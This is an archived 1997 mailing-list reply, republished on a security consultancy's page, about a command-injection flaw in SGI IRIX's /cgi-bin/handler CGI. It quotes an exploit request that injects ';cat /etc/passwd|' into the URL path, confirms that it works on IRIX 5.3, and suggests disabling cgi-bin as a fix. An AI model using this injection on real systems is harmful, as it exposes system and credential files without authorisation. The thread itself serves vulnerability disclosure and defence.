return to the home
         page NJH Security Consulting
Security Audit Latest Vulnerabilities Back to Main Services Page
Security Products
NJH Services
Training
Latest security vulnerabilities      Re: Bug in SGI's /cgi-bin/handler
Frequently asked questions
NJH Contact Information
Search This Site

[Previous] [Next] [June 1997] [Latest]

Re: Bug in SGI's /cgi-bin/handler

This HTML page has been automatically generated from a mail message and therefore the formatting may have changed, particularly with code fragments.

Author: Yaron Yanay <yarony@vipe.technion.ac.il>
Source: Yaron Yanay <yarony@vipe.technion.ac.il>
Date: Sun, 15 Jun 1997 13:49:01 +0300

Below is the original message:


On Sun, 15 Jun 1997, Razvan Dragomirescu wrote:
:The way to exploit this "feature" for cgi-bin/handler is:

:telnet target.machine.com 80
:GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=Download
:HTTP/1.0

:I tested it on two Indy machines with IRIX 6.2. I would appreciate any
:feedback from you.

It worked on my IRIX 5.3 machines.
my fix: chmod 0 /var/www/cgi-bin
Yaron.
\\\|///
\\ - - //
( @ @ )
+-----------------------oOOo-(_)-oOOo-------------+
| Yaron Yanay. email:yarony@yarony.il.eu.org |
| yarony@tx.technion.ac.il |
| http://www.technion.ac.il/~yarony |
| http://yarony.il.eu.org |
+-------------------------------Oooo--------------+
oooO ( )
( ) ) /
\ ( (_/
\_)